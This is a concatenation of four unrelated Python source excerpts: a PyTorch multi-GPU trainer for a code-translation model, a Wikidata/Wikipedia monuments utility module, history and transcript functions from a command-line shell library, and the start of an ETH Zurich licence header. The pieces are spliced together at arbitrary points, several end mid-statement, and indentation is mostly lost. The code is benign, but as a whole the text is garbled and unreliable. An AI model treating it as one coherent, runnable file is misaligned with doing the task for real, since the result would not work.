alpha=self.focal_loss_alpha,
gamma=self.focal_loss_gamma,
reduction="sum",
)"""
gt_labels_target = gt_labels[valid_mask]
# gt_labels_target = gt_labels_target_[gt_labels_target_ != 10]
pred_logits = cat(pred_logits, dim=1)[valid_mask]
# pred_logits = pred_logits[gt_labels_target_ != 10]
unique_labels, count = torch.unique(gt_labels_target, return_counts=True)
samples_per_cls = torch.zeros(self.num_classes + 1, dtype=torch.int64).cuda()
# Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
import math
import os
import random
import time
from collections import OrderedDict
from concurrent.futures.process import ProcessPoolExecutor
from logging import getLogger
import apex
import numpy as np
import torch
from torch.nn.utils import clip_grad_norm_
from .cache import ListCache, RoundRobinCache
from .data.loader import SELF_TRAINED
from .model.CustomDDP import CustomTorchDDP, CustomApexDDP
from .optim import get_optimizer
from .utils import (
parse_lambda_config,
update_lambdas,
convert_to_text,
add_noise,
safe_index,
restore_segmentation_sentence,
get_programming_language_name,
)
from .utils import to_cuda, concat_batches, batch_sentences, show_batch
import sys
from pathlib import Path
sys.path.append(str(Path(__file__).parents[3]))
print("adding to path", str(Path(__file__).parents[3]))
from codegen_sources.test_generation.test_runners.python_test_runner import (
PythonTestRunner,
)
from codegen_sources.test_generation.test_runners.cpp_test_runner import CppTestRunner
logger = getLogger()
class Trainer(object):
def __init__(self, data, params, model_names):
"""
Initialize trainer.
"""
# epoch / iteration size
self.params = params
self.data = data
self.MODEL_NAMES = model_names
self.epoch_size = params.epoch_size
if self.epoch_size == -1:
self.epoch_size = len(self.data)
assert self.epoch_size > 0
# data iterators
self.iterators = {}
# set parameters
self.set_parameters()
# float16 / distributed (no AMP)
assert params.amp >= 1 or not params.fp16
assert params.amp >= 0 or params.accumulate_gradients == 1
if params.multi_gpu and params.amp == -1:
logger.info("Using nn.parallel.DistributedDataParallel ...")
for name in self.MODEL_NAMES:
model_attr = getattr(self, name)
if isinstance(model_attr, list):
setattr(
self,
name,
[
CustomTorchDDP(
model,
device_ids=[params.local_rank],
output_device=params.local_rank,
broadcast_buffers=True,
)
for model in model_attr
],
)
else:
setattr(
self,
name,
CustomTorchDDP(
model_attr,
device_ids=[params.local_rank],
output_device=params.local_rank,
broadcast_buffers=True,
),
)
# set optimizers
self.set_optimizers()
# float16 / distributed (AMP)
if params.amp >= 0:
self.init_amp()
if params.multi_gpu:
logger.info("Using apex.parallel.DistributedDataParallel ...")
for name in self.MODEL_NAMES:
model_attr = getattr(self, name)
if isinstance(model_attr, list):
setattr(
self,
name,
[
CustomApexDDP(model, delay_allreduce=True)
for model in model_attr
],
)
else:
setattr(
self, name, CustomApexDDP(model_attr, delay_allreduce=True),
)
# stopping criterion used for early stopping
if params.stopping_criterion != "":
split = params.stopping_criterion.split(",")
assert len(split) == 2 and split[1].isdigit()
self.decrease_counts_max = int(split[1])
self.decrease_counts = 0
if split[0][0] == "_":
self.stopping_criterion = (split[0][1:], False)
else:
self.stopping_criterion = (split[0], True)
self.best_stopping_criterion = -1e12 if self.stopping_criterion[1] else 1e12
else:
self.stopping_criterion = None
self.best_stopping_criterion = None
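        # Example stopping_criterion formats (illustrative values only):
        #   "valid_java-python_mt_bleu,10"  -> maximize the metric; stop after
        #                                      10 non-improving evaluations
        #   "_valid_java-python_mt_ppl,10"  -> a leading "_" means minimize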
if len(params.st_steps) > 0:
self.test_runners = {
"python": PythonTestRunner(timeout=params.st_test_timeout),
"cpp": CppTestRunner(timeout=params.st_test_timeout),
}
self.unit_tests = data[f"java_st_unit_tests"]
# probability of masking out / randomize / not modify words to predict
params.pred_probs = torch.FloatTensor(
[params.word_mask, params.word_keep, params.word_rand]
)
        # probability to predict a word
counts = np.array(list(self.data["dico"].counts.values()))
params.mask_scores = np.maximum(counts, 1) ** -params.sample_alpha
params.mask_scores[params.pad_index] = 0 # do not predict <PAD> index
# do not predict special tokens
params.mask_scores[counts == 0] = 0
# validation metrics
self.metrics = []
metrics = [m for m in params.validation_metrics.split(",") if m != ""]
for m in metrics:
m = (m[1:], False) if m[0] == "_" else (m, True)
self.metrics.append(m)
self.best_metrics = {
metric: (-1e12 if biggest else 1e12) for (metric, biggest) in self.metrics
}
# training statistics
self.epoch = 0
self.n_iter = 0
self.n_total_iter = 0
self.n_sentences = 0
self.stats = OrderedDict(
[("processed_s", 0), ("processed_w", 0)]
+ [("CLM-%s" % l, []) for l in params.langs]
+ [("CLM-%s" % ("-".join(keys)), []) for keys in data["para"].keys()]
+ [("CLM-%s" % "-".join(keys[::-1]), []) for keys in data["para"].keys()]
+ [("MLM-%s" % l, []) for l in params.langs]
+ [("MLM-%s" % ("-".join(keys)), []) for keys in data["para"].keys()]
+ [("MLM-%s" % "-".join(keys[::-1]), []) for keys in data["para"].keys()]
+ [("AE-%s" % lang, []) for lang in params.ae_steps]
+ [("MT-%s-%s" % (l1, l2), []) for l1, l2 in params.mt_steps]
+ [
("MT-%s-%s-%s" % (l1, l2, span), [])
for l1, l2, span in params.mt_spans_steps
]
+ [("DO-%s-%s" % (l1, l2), []) for l1, l2 in params.do_steps]
+ [("Classif-%s-%s" % (l1, l2), []) for l1, l2 in params.classif_steps]
+ [("BT-%s-%s-%s" % (l1, l2, l3), []) for l1, l2, l3 in params.bt_steps]
+ [
("ST-%s:%s-%s" % (l1, l1, l2), [])
for l1, langs2 in params.st_steps
for l2 in langs2
]
+ [
("ST-%s:%s-%s" % (l1, l2, l1), [])
for l1, langs2 in params.st_steps
for l2 in langs2
]
+ [
("ST-%s:%s-%s" % (l1, l2_1, l2_2), [])
for l1, langs2 in params.st_steps
for l2_1 in langs2
for l2_2 in langs2
if l2_1 != l2_2
]
)
self.last_time = time.time()
self.st_langs = set()
for lang1, langs2 in params.st_steps:
for l1 in [lang1] + list(langs2):
for l2 in [lang1] + list(langs2):
if l1 < l2:
self.st_langs.add((l1, l2))
self.cache_class = RoundRobinCache if params.robin_cache else ListCache
self.st_cache = {
tuple([l1, l2]): self.cache_class(params=params) for l1, l2 in self.st_langs
}
self.number_consecutive_reads = 0
if params.cache_init_path != "":
self.load_initial_cache()
# reload potential checkpoints
self.reload_checkpoint()
# initialize lambda coefficients and their configurations
parse_lambda_config(params)
def load_initial_cache(self):
for (l1, l2), cache in self.st_cache.items():
cache_path = Path(self.params.cache_init_path).joinpath(
f"cache_{l1}-{l2}.pkl"
)
assert cache_path.is_file(), f"initial cache file {cache_path} is missing"
cache.load(cache_path)
def set_parameters(self):
"""
Set parameters.
"""
self.parameters = {}
named_params = []
for name in self.MODEL_NAMES:
models = getattr(self, name)
if isinstance(models, list):
for model in models:
named_params.extend(
[(k, p) for k, p in model.named_parameters() if p.requires_grad]
)
else:
named_params.extend(
[(k, p) for k, p in models.named_parameters() if p.requires_grad]
)
# model parameters
self.parameters["model"] = [p for k, p in named_params]
# log
for k, v in self.parameters.items():
logger.info("Found %i parameters in %s." % (len(v), k))
assert len(v) >= 1
def set_optimizers(self):
"""
Set optimizers.
"""
params = self.params
self.optimizers = {}
# model optimizer
self.optimizers["model"] = get_optimizer(
self.parameters["model"], params.optimizer
)
# log
logger.info("Optimizers: %s" % ", ".join(self.optimizers.keys()))
def init_amp(self):
"""
Initialize AMP optimizer.
"""
params = self.params
        assert (params.amp == 0 and params.fp16 is False) or (
            params.amp in [1, 2, 3] and params.fp16 is True
        )
opt_names = self.optimizers.keys()
models = [
model
for name in self.MODEL_NAMES
for model in (
getattr(self, name)
if isinstance(getattr(self, name), list)
else [getattr(self, name)]
)
]
models, optimizers = apex.amp.initialize(
models,
[self.optimizers[k] for k in opt_names],
opt_level=("O%i" % params.amp),
)
current_index = 0
for name in self.MODEL_NAMES:
model_attr = getattr(self, name)
if isinstance(model_attr, list):
models_length = len(model_attr)
setattr(
self, name, models[current_index : current_index + models_length]
)
current_index += models_length
else:
setattr(self, name, models[current_index])
current_index += 1
assert current_index == len(models)
self.optimizers = {
opt_name: optimizer for opt_name, optimizer in zip(opt_names, optimizers)
}
def optimize(self, loss):
"""
Optimize.
"""
# check NaN
if (loss != loss).data.any():
logger.warning("NaN detected")
# exit()
params = self.params
# optimizers
names = self.optimizers.keys()
optimizers = [self.optimizers[k] for k in names]
# regular optimization
if params.amp == -1:
for optimizer in optimizers:
optimizer.zero_grad()
loss.backward()
if params.clip_grad_norm > 0:
for name in names:
# norm_check_a = (sum([p.grad.norm(p=2).item() ** 2 for p in self.parameters[name]])) ** 0.5
clip_grad_norm_(self.parameters[name], params.clip_grad_norm)
# norm_check_b = (sum([p.grad.norm(p=2).item() ** 2 for p in self.parameters[name]])) ** 0.5
# print(name, norm_check_a, norm_check_b)
for optimizer in optimizers:
optimizer.step()
# AMP optimization
else:
if self.n_iter % params.accumulate_gradients == 0:
with apex.amp.scale_loss(loss, optimizers) as scaled_loss:
scaled_loss.backward()
if params.clip_grad_norm > 0:
for name in names:
# norm_check_a = (sum([p.grad.norm(p=2).item() ** 2 for p in apex.amp.master_params(self.optimizers[name])])) ** 0.5
clip_grad_norm_(
apex.amp.master_params(self.optimizers[name]),
params.clip_grad_norm,
)
# norm_check_b = (sum([p.grad.norm(p=2).item() ** 2 for p in apex.amp.master_params(self.optimizers[name])])) ** 0.5
# print(name, norm_check_a, norm_check_b)
for optimizer in optimizers:
optimizer.step()
optimizer.zero_grad()
else:
with apex.amp.scale_loss(
loss, optimizers, delay_unscale=True
) as scaled_loss:
scaled_loss.backward()
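        # Illustration of the accumulation schedule above (assuming
        # accumulate_gradients == 4): on iterations where n_iter % 4 != 0 only
        # the scaled backward pass runs (with delay_unscale=True); on every
        # iteration where n_iter % 4 == 0 the gradients are unscaled,
        # optionally clipped, applied with step(), and zeroed.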
def iter(self):
"""
End of iteration.
"""
self.n_iter += 1
self.n_total_iter += 1
update_lambdas(self.params, self.n_total_iter)
if self.n_iter % 5 == 0:
self.print_stats()
def print_stats(self):
"""
Print statistics about the training.
"""
# if self.n_total_iter % 5 != 0:
# return
s_iter = "%7i - " % self.n_total_iter
s_stat = " || ".join(
[
"{}: {:7.4f}".format(k, np.mean(v))
for k, v in self.stats.items()
if type(v) is list and len(v) > 0
]
)
for k in self.stats.keys():
if type(self.stats[k]) is list:
del self.stats[k][:]
# learning rates
s_lr = " - "
for k, v in self.optimizers.items():
s_lr = (
s_lr
+ (" - %s LR: " % k)
+ " / ".join("{:.4e}".format(group["lr"]) for group in v.param_groups)
)
if self.params.bt_sample_temperature > 0:
s_bt_samp = " - BT-sampling-T: " + "{:2.2e}".format(
self.params.bt_sample_temperature
)
else:
s_bt_samp = ""
# processing speed
new_time = time.time()
diff = new_time - self.last_time
s_speed = "{:7.2f} sent/s - {:8.2f} words/s - ".format(
self.stats["processed_s"] * 1.0 / | |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import json
import csv
import re
import os
import mwparserfromhell as wparser
import string
import pywikibot
import datetime
import requests
import pymysql
import random
from urllib.parse import quote
from wikidataStuff.WikidataStuff import WikidataStuff as wds
site_cache = {}
def remove_empty_dicts_from_list(list_of_dicts):
return [i for i in list_of_dicts if i]
def save_to_file(filename, content, silent=False):
with open(filename, 'w', encoding="utf-8") as f:
f.write(content)
if not silent:
print("SAVED FILE " + filename)
def json_to_file(filename, json_content, silent=False):
with open(filename, 'w', encoding="utf-8") as f:
json.dump(json_content, f, sort_keys=True,
indent=4,
ensure_ascii=False,
default=datetime_convert)
if not silent:
print("SAVED FILE " + filename)
def create_dir(out_path):
"""
Create a directory if it doesn't exist.
@param out_path: directory to create
"""
if not out_path:
        raise ValueError('Cannot create a directory without a name.')
if not os.path.exists(out_path):
os.mkdir(out_path)
elif os.path.isfile(out_path):
raise ValueError(
'Cannot create the directory "{}" as a file with that name '
'already exists.'.format(out_path))
def get_specific_table_name(countryname, languagename):
return "monuments_{}_({})".format(countryname, languagename)
def get_number_of_rows(connection, tablename):
cursor = connection.cursor()
query = "SELECT COUNT(*) FROM `" + tablename + "`"
cursor.execute(query)
result = cursor.fetchone()
return result[0]
def table_exists(connection, tablename):
try:
if get_number_of_rows(connection, tablename) > 0:
return True
except pymysql.ProgrammingError:
return False
def load_json(filename):
try:
with open(filename, encoding="utf-8") as f:
try:
return json.load(f)
except ValueError:
print("Failed to decode file {}.".format(filename))
except OSError:
print("File {} does not exist.".format(filename))
def datetime_convert(dt_object):
if isinstance(dt_object, datetime.datetime):
return dt_object.__str__()
def remove_multiple_spaces(text):
return re.sub(' +', ' ', text)
def remove_markup(text):
    remove_br = re.compile(r'<br.*?>\W*', re.I)
text = remove_br.sub(' ', text)
text = " ".join(text.split())
if "[" in text or "''" in text:
text = wparser.parse(text)
text = text.strip_code()
return remove_multiple_spaces(text.strip())
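# Illustrative example (assumed wikitext input):
#   remove_markup("[[Stockholm|Sthlm]]<br/> city")  ->  "Sthlm city"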
def contains_digit(text):
return any(x.isdigit() for x in text)
def get_external_links(wikitext):
"""Retrieve external url's from wikitext."""
urls = []
links = wparser.parse(wikitext).filter_external_links()
if len(links) > 0:
for link in links:
urls.append(link.url)
return urls
def is_legit_house_number(text):
    number_regex = re.compile(
        r'\d{1,3}\s?([A-Z]{1})?((-|–)\d{1,3})?\s?([A-Z]{1})?')
    m = number_regex.match(text)
    return bool(m)
def get_street_address(address, language):
address = remove_markup(address)
if language == "sv":
# Try to see if it's a legit-ish street address
# numbers like 3, 3A, 2-4
# oh, and sometimes it's not a _street_ name: "Norra Kik 7"
# street names can consist of several words: "<NAME> gata 19"
# how about: "Östra skolan, Bergaliden 24"
# "Västanåvägen 12-6, Näsum"
# If there's a comma, order can vary
#####
# regex should match: 12, 3, 43-45, 34b, 43B, 25 a, 43B-43E
legit_address = None
interesting_part = ""
patterns = ["gatan", "vägen", " väg", " gata",
" torg", "torget", " plats", "platsen", " gränd",
"kajen", "promenaden", "liden", "stigen"]
if "," in address:
address_split = address.split(",", re.IGNORECASE)
for part in address_split:
if (any(substring in part for substring in patterns) and
contains_digit(part)):
interesting_part = part.strip()
else:
if (any(substring in address for substring in patterns) and
contains_digit(address)):
interesting_part = address
if len(interesting_part) > 1:
interesting_part_split = interesting_part.split(" ")
for part in interesting_part_split:
if contains_digit(part) and is_legit_house_number(part):
legit_address = interesting_part.rstrip(',.-')
return legit_address
def get_wikilinks(text):
parsed = wparser.parse(text)
return parsed.filter_wikilinks()
def get_unique_wikilinks(text):
results = []
wikilinks = get_wikilinks(text)
for wikilink in wikilinks:
if wikilink not in results:
results.append(wikilink)
return results
def count_wikilinks(text):
return len(get_wikilinks(text))
def q_from_wikipedia(language, page_title):
"""
Get the ID of the WD item linked to a wp page.
If the page exists, has no item and is in the article
namespace, create an item for it.
"""
# various cleanup
if page_title.startswith("[[") and page_title.endswith("]]"):
internal_links = get_wikilinks(page_title)
if not internal_links:
return
page_title = internal_links[0].title
if isinstance(page_title, str):
# get_wikilinks()[0].title does not return a str
page_title = page_title.replace('\n', ' ')
if not page_title:
return
wp_site = pywikibot.Site(language, "wikipedia")
page = pywikibot.Page(wp_site, page_title)
summary = "Creating item for {} on {}wp."
summary = summary.format(page_title, language)
wd_repo = create_site_instance("wikidata", "wikidata")
wdstuff = wds(wd_repo, edit_summary=summary, no_wdss=True)
if page.exists():
if page.isRedirectPage():
page = page.getRedirectTarget()
if page.isDisambig():
return
try:
item = pywikibot.ItemPage.fromPage(page)
except pywikibot.NoPage:
if page.namespace() != 0: # main namespace
return
item = wdstuff.make_new_item_from_page(page, summary)
return item.getID()
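# Hedged usage sketch (illustration only; assumes the page resolves normally
# and that Q1754 is the linked Wikidata item for Stockholm):
#   q_from_wikipedia("sv", "Stockholm")  ->  "Q1754"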
def q_from_first_wikilink(language, text):
try:
wikilink = get_wikilinks(text)[0]
return q_from_wikipedia(language, wikilink.title)
except IndexError:
return
def get_matching_items_from_dict(value, dict_name):
"""
Return all items in a dict for which the label matches the provided value.
@param value: the value to match
@param dict_name: the dict to look in
"""
matches = [dict_name[x]["items"]
for x in dict_name if x.lower() == value]
if len(matches) == 0:
return []
else:
return matches[0]
def get_item_from_dict_by_key(dict_name,
search_term,
search_in,
return_content_of="item"):
"""
Return all items in a dict with a certain field match.
It will normally return the content of the field
'item' which is expected to contain a Q-item.
It is, however, possible to overwrite the name
of the field whose contents should be returned.
@param dict_name: the dictionary to look in
    @param search_term: the value to match
@param search_in: the field in which to look for matching value
@param return_content_of: the field whose content to return
"""
results = []
matches = [x for x in dict_name if x[search_in] == search_term]
if len(matches) == 0:
return []
else:
for match in matches:
results.append(match[return_content_of])
return results
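# Illustrative example (hypothetical data):
#   items = [{"label": "bro", "item": "Q12280"},
#            {"label": "kyrka", "item": "Q16970"}]
#   get_item_from_dict_by_key(items, "bro", "label")  ->  ["Q12280"]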
def legit_year(text):
year = None
if text and text.isdigit():
if int(text) >= 1 and int(text) <= 2020:
year = int(text)
return year
def legit_year_range(text):
year_range = None
if "-" in text and len(text.split("-")) == 2:
part_one = text.split("-")[0]
part_two = text.split("-")[1]
if parse_year(part_one) and parse_year(part_two):
if (len(part_one) == len(part_two) and
int(part_two) > int(part_one)):
year_range = (int(part_one), int(part_two))
elif len(part_one) == 4 and len(part_two) == 2:
full_length_part_two = part_one[:2] + part_two
if int(full_length_part_two) > int(part_one):
year_range = (int(part_one), int(full_length_part_two))
return year_range
def parse_year(text):
year = None
if legit_year(text):
year = legit_year(text)
elif ("-") in text:
year = legit_year_range(text)
return year
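# Illustrative examples:
#   parse_year("1905")     ->  1905
#   parse_year("1905-08")  ->  (1905, 1908)   # short second part is expanded
#   parse_year("2025")     ->  None           # outside the accepted 1-2020 range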
def get_longest_string(in_list):
"""
Get the longest string(s) in a list.
:param in_list: list of strings
:return: single string if there's only one with the max length,
or a list of strings if there are several.
"""
if len(in_list) == 0:
return None
max_length = max(len(x) for x in in_list)
matches = [x for x in in_list if len(x) == max_length]
if len(matches) == 1:
return matches[0]
else:
return matches
def get_longest_match(word, keywords):
"""
Given a list of keywords, get longest keyword that overlaps with input.
A naive attempt to match words in languages that use
compound nouns written together. Given a string and a list of
keywords, return the longest of these keywords that's
contained in the input string. That way, if the keyword list
contains both a simple word ("bro") and its compound ("järnvägsbro"),
we only get the more specific one:
* "götaälvsbron" -> "bro"
* "en stor järnvägsbro" -> "järnvägsbro"
"""
matches = []
for k in keywords:
if k in word:
matches.append(k)
return get_longest_string(matches)
def remove_characters(text, string_of_chars_to_remove):
translator = str.maketrans(
{key: None for key in string_of_chars_to_remove})
return text.translate(translator)
def comma_to_period(text):
return text.replace(",", ".")
def remove_marks_from_ends(text):
return text.lstrip(string.punctuation).rstrip(string.punctuation)
def string_to_float(text):
text_clean = remove_marks_from_ends(text)
text_clean = comma_to_period(text_clean)
return float(text_clean)
def parse_ship_dimensions(text):
dimensions_vocab = {
"längd": "length",
"bredd": "width",
"djup": "draft",
"brt": "grt"
}
dimensions_dict = {}
dimensions_list = text.split(" ")
for i, item in enumerate(dimensions_list):
if contains_digit(item):
try:
number_part = string_to_float(comma_to_period(item))
associated_word = remove_marks_from_ends(
dimensions_list[i - 1].lower())
word_part = dimensions_vocab[associated_word]
dimensions_dict[word_part] = number_part
except (ValueError, KeyError):
continue
return dimensions_dict
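# Illustrative example (Swedish keywords per dimensions_vocab above):
#   parse_ship_dimensions("längd 30,2 bredd 6,1 djup 2,8 brt 238")
#   ->  {"length": 30.2, "width": 6.1, "draft": 2.8, "grt": 238.0}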
def is_vowel(char):
vowels = "auoiyéeöåäáæø"
if char.lower() in vowels:
return True
else:
return False
def get_last_char(text):
return text[-1]
def last_char_is_vowel(text):
return is_vowel(get_last_char(text))
def first_char_is_number(text):
"""Check if string starts with a number."""
return text[0].isdigit()
def socken_to_q(socken, landskap):
if last_char_is_vowel(socken) or get_last_char(socken) == "s":
socken_name = socken + " socken"
else:
socken_name = socken + "s socken"
socken_and_landskap = socken_name + ", " + landskap
if wp_page_exists("sv", socken_and_landskap):
return q_from_wikipedia("sv", socken_and_landskap)
elif wp_page_exists("sv", socken_name):
return q_from_wikipedia("sv", socken_name)
def get_http_code(url):
r = requests.get(url)
return r.status_code
def get_bbr_link(text):
"""
raa/bbr/21300000003265
"""
base_url = "http://kulturarvsdata.se/raa/"
url_bbr = base_url + "bbr/" + text
url_bbra = base_url + "bbra/" + text
if get_http_code(url_bbra) == 200:
return "raa/bbra/" + text
elif get_http_code(url_bbr) == 200:
return "raa/bbr/" + text
def get_rid_of_brackets(text):
if "(" in text:
        return re.sub(r'\(.*?\)', '', text).strip()
else:
return text
def get_text_inside_brackets(text):
"""
    Get the content of the first encountered occurrence of round brackets.
Handles nested brackets by getting the content of
the first level:
foo (cat) → cat
text (foo (bar (cat))) around → foo (bar (cat))
    Does not handle multiple instances
            # Clear command and readline history
self.history.clear()
if self.persistent_history_file:
os.remove(self.persistent_history_file)
if rl_type != RlType.NONE:
readline.clear_history()
return
# If an argument was supplied, then retrieve partial contents of the history
cowardly_refuse_to_run = False
if args.arg:
# If a character indicating a slice is present, retrieve
# a slice of the history
arg = args.arg
arg_is_int = False
try:
int(arg)
arg_is_int = True
except ValueError:
pass
if '..' in arg or ':' in arg:
# Get a slice of history
history = self.history.span(arg, args.all)
elif arg_is_int:
history = [self.history.get(arg)]
elif arg.startswith(r'/') and arg.endswith(r'/'):
history = self.history.regex_search(arg, args.all)
else:
history = self.history.str_search(arg, args.all)
else:
# If no arg given, then retrieve the entire history
cowardly_refuse_to_run = True
# Get a copy of the history so it doesn't get mutated while we are using it
history = self.history.span(':', args.all)
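        # Argument forms accepted by the branches above (illustrative):
        #   "2"        -> the single item at history index 2
        #   "1:5"      -> a span of items (".." behaves the same way)
        #   "/regex/"  -> items matching a regular expression
        #   "text"     -> items containing the literal string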
if args.run:
if cowardly_refuse_to_run:
self.perror("Cowardly refusing to run all previously entered commands.")
self.perror("If this is what you want to do, specify '1:' as the range of history.")
else:
return self.runcmds_plus_hooks(history)
elif args.edit:
import tempfile
fd, fname = tempfile.mkstemp(suffix='.txt', text=True)
with os.fdopen(fd, 'w') as fobj:
for command in history:
if command.statement.multiline_command:
fobj.write('{}\n'.format(command.expanded))
else:
fobj.write('{}\n'.format(command.raw))
try:
self._run_editor(fname)
# noinspection PyTypeChecker
self.do_run_script(utils.quote_string(fname))
finally:
os.remove(fname)
elif args.output_file:
try:
with open(os.path.expanduser(args.output_file), 'w') as fobj:
for item in history:
if item.statement.multiline_command:
fobj.write('{}\n'.format(item.expanded))
else:
fobj.write('{}\n'.format(item.raw))
plural = 's' if len(history) > 1 else ''
except OSError as e:
self.pexcept('Error saving {!r} - {}'.format(args.output_file, e))
else:
self.pfeedback('{} command{} saved to {}'.format(len(history), plural, args.output_file))
elif args.transcript:
self._generate_transcript(history, args.transcript)
else:
# Display the history items retrieved
for hi in history:
self.poutput(hi.pr(script=args.script, expanded=args.expanded, verbose=args.verbose))
def _initialize_history(self, hist_file):
"""Initialize history using history related attributes
This function can determine whether history is saved in the prior text-based
format (one line of input is stored as one line in the file), or the new-as-
of-version 0.9.13 pickle based format.
History created by versions <= 0.9.12 is in readline format, i.e. plain text files.
        Initializing history does not affect history files on disk; versions >= 0.9.13 always
write history in the pickle format.
"""
self.history = History()
# with no persistent history, nothing else in this method is relevant
if not hist_file:
self.persistent_history_file = hist_file
return
hist_file = os.path.abspath(os.path.expanduser(hist_file))
        # on Windows, trying to open a directory throws a permission
        # error, not an `IsADirectoryError`. So we'll check it ourselves.
if os.path.isdir(hist_file):
msg = "Persistent history file '{}' is a directory"
self.perror(msg.format(hist_file))
return
# Create the directory for the history file if it doesn't already exist
hist_file_dir = os.path.dirname(hist_file)
try:
os.makedirs(hist_file_dir, exist_ok=True)
except OSError as ex:
msg = "Error creating persistent history file directory '{}': {}".format(hist_file_dir, ex)
self.pexcept(msg)
return
# first we try and unpickle the history file
history = History()
try:
with open(hist_file, 'rb') as fobj:
history = pickle.load(fobj)
except (AttributeError, EOFError, FileNotFoundError, ImportError, IndexError, KeyError, ValueError,
pickle.UnpicklingError):
# If any of these errors occur when attempting to unpickle, just use an empty history
pass
except OSError as ex:
msg = "Can not read persistent history file '{}': {}"
self.pexcept(msg.format(hist_file, ex))
return
self.history = history
self.history.start_session()
self.persistent_history_file = hist_file
# populate readline history
if rl_type != RlType.NONE:
last = None
for item in history:
# Break the command into its individual lines
for line in item.raw.splitlines():
# readline only adds a single entry for multiple sequential identical lines
# so we emulate that behavior here
if line != last:
readline.add_history(line)
last = line
# register a function to write history at save
# if the history file is in plain text format from 0.9.12 or lower
# this will fail, and the history in the plain text file will be lost
import atexit
atexit.register(self._persist_history)
def _persist_history(self):
"""Write history out to the history file"""
if not self.persistent_history_file:
return
self.history.truncate(self._persistent_history_length)
try:
with open(self.persistent_history_file, 'wb') as fobj:
pickle.dump(self.history, fobj)
except OSError as ex:
msg = "Can not write persistent history file '{}': {}"
self.pexcept(msg.format(self.persistent_history_file, ex))
def _generate_transcript(self, history: List[Union[HistoryItem, str]], transcript_file: str) -> None:
"""Generate a transcript file from a given history of commands"""
# Validate the transcript file path to make sure directory exists and write access is available
transcript_path = os.path.abspath(os.path.expanduser(transcript_file))
transcript_dir = os.path.dirname(transcript_path)
if not os.path.isdir(transcript_dir) or not os.access(transcript_dir, os.W_OK):
self.perror("{!r} is not a directory or you don't have write access".format(transcript_dir))
return
commands_run = 0
try:
with self.sigint_protection:
# Disable echo while we manually redirect stdout to a StringIO buffer
saved_echo = self.echo
saved_stdout = self.stdout
self.echo = False
# The problem with supporting regular expressions in transcripts
# is that they shouldn't be processed in the command, just the output.
# In addition, when we generate a transcript, any slashes in the output
# are not really intended to indicate regular expressions, so they should
# be escaped.
#
# We have to jump through some hoops here in order to catch the commands
# separately from the output and escape the slashes in the output.
transcript = ''
for history_item in history:
# build the command, complete with prompts. When we replay
# the transcript, we look for the prompts to separate
# the command from the output
first = True
command = ''
if isinstance(history_item, HistoryItem):
history_item = history_item.raw
for line in history_item.splitlines():
if first:
command += '{}{}\n'.format(self.prompt, line)
first = False
else:
command += '{}{}\n'.format(self.continuation_prompt, line)
transcript += command
# Use a StdSim object to capture output
self.stdout = utils.StdSim(self.stdout)
# then run the command and let the output go into our buffer
try:
stop = self.onecmd_plus_hooks(history_item, raise_keyboard_interrupt=True)
except KeyboardInterrupt as e:
self.perror(e)
stop = True
commands_run += 1
# add the regex-escaped output to the transcript
transcript += self.stdout.getvalue().replace('/', r'\/')
# check if we are supposed to stop
if stop:
break
finally:
with self.sigint_protection:
# Restore altered attributes to their original state
self.echo = saved_echo
self.stdout = saved_stdout
# Check if all commands ran
if commands_run < len(history):
warning = "Command {} triggered a stop and ended transcript generation early".format(commands_run)
self.pwarning(warning)
# finally, we can write the transcript out to the file
try:
with open(transcript_file, 'w') as fout:
fout.write(transcript)
except OSError as ex:
self.pexcept('Failed to save transcript: {}'.format(ex))
else:
# and let the user know what we did
if commands_run > 1:
plural = 'commands and their outputs'
else:
plural = 'command and its output'
msg = '{} {} saved to transcript file {!r}'
self.pfeedback(msg.format(commands_run, plural, transcript_file))
edit_description = ("Run a text editor and optionally open a file with it\n"
"\n"
"The editor used is determined by a settable parameter. To set it:\n"
"\n"
" set editor (program-name)")
edit_parser = DEFAULT_ARGUMENT_PARSER(description=edit_description)
edit_parser.add_argument('file_path', nargs=argparse.OPTIONAL,
help="optional path to a file to open in editor", completer_method=path_complete)
@with_argparser(edit_parser)
def do_edit(self, args: argparse.Namespace) -> None:
"""Run a text editor and optionally open a file with it"""
self._run_editor(args.file_path)
def _run_editor(self, file_path: Optional[str]) -> None:
"""
Run a text editor and optionally open a file with it
:param file_path: optional path of the file to edit
:raises: EnvironmentError if self.editor is not set
"""
if not self.editor:
raise EnvironmentError("Please use 'set editor' to specify your text editing program of choice.")
command = utils.quote_string(os.path.expanduser(self.editor))
if file_path:
command += " " + utils.quote_string(os.path.expanduser(file_path))
# noinspection PyTypeChecker
self.do_shell(command)
@property
def _current_script_dir(self) -> Optional[str]:
"""Accessor to get the current script directory from the _script_dir LIFO queue."""
if self._script_dir:
return self._script_dir[-1]
else:
return None
run_script_description = ("Run commands in script file that is encoded as either ASCII or UTF-8 text\n"
"\n"
"Script should contain one command per line, just like the command would be\n"
"typed in the console.\n"
"\n"
"If the -t/--transcript flag is used, this command instead records\n"
"the output of the script commands to a transcript for testing purposes.\n")
run_script_parser = DEFAULT_ARGUMENT_PARSER(description=run_script_description)
run_script_parser.add_argument('-t', '--transcript', metavar='TRANSCRIPT_FILE',
help='record the output of the script as a transcript file',
completer_method=path_complete)
run_script_parser.add_argument('script_path', help="path to the script file", completer_method=path_complete)
@with_argparser(run_script_parser)
def do_run_script(self, args: argparse.Namespace) -> Optional[bool]:
"""Run commands in script file that is | |
#! /usr/bin/env python3
"""
Copyright (c) 2010 - 2020, ETH Zurich, Computer Engineering Group
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
